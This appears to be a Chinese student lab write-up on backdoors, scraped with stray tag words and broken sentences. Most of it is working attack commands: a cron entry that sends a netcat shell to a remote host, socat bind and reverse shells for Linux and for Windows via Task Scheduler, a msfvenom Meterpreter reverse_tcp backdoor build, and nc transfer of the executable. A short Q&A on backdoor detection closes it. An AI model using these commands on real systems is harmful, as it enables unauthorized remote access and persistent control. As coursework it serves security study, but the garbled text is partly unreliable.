service crond start //启动服务
linux
service crond stop //关闭服务
shell
service crond restart //重启服务
vim
service crond reload //从新载入配置
windows
service crond status //查看服务状态
网络
10 17 27 3 * /bin/netcat 192.168.1.102 5213 -e /bin/sh
192.168.1.102
的计算机上。192.168.1.102
机器监听端口为5213socat - tcp:192.168.43.252:5213 #链接ip 为 192.168.43.252 主机的80端口
socat - tcp-l:5213 #侦听本机的5213端口
socat tcp-l:5213 exec:<sh>,pty,stderr #当有主机链接本机的5213端口时,将会发送本机的shell给链接端
建立任务
,在常规
选项卡中编辑名称,并在触发器
选项卡中选择按预约计划
,这样到达预约时间,咱们的socat就会传递远程shell:操做
选项卡中绑定socat程序,给出参数tcp-listen:5213 exec:cmd.exe,pty,stderr
socat - tcp:192.168.43.252:5213
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.161 LPORT=5213 -f exe > 20155213_backdoor.exe
在win下面使用ncat.exe -l 5213 > 20155213_backdoor.exe
监听并接受后门程序;
tcp
nc 192.168.43.252 5213 < 20155213_backdoor.exe
向win传输后门程序。在win下面运行后门程序,一会后能够发现msf命令行已经成功得到cmd.exe.
工具
(1)例举你能想到的一个后门进入到你系统中的可能方式?命令行
答:后门通常隐藏在正常应用程序之中,甚至官方故意将后门设置在系统中。rest
(2)例举你知道的后门如何启动起来(win及linux)的方式?code
答:能够是绑定到某些程序上,达到自启动
(3)Meterpreter有哪些给你映像深入的功能?
答:主要就是若是后门程序竟然能够在未受权的状况下,得到别人Shell!
(4)如何发现本身的系统有没有被安装后门?
答:查看进程和注册表来发现系统的异常。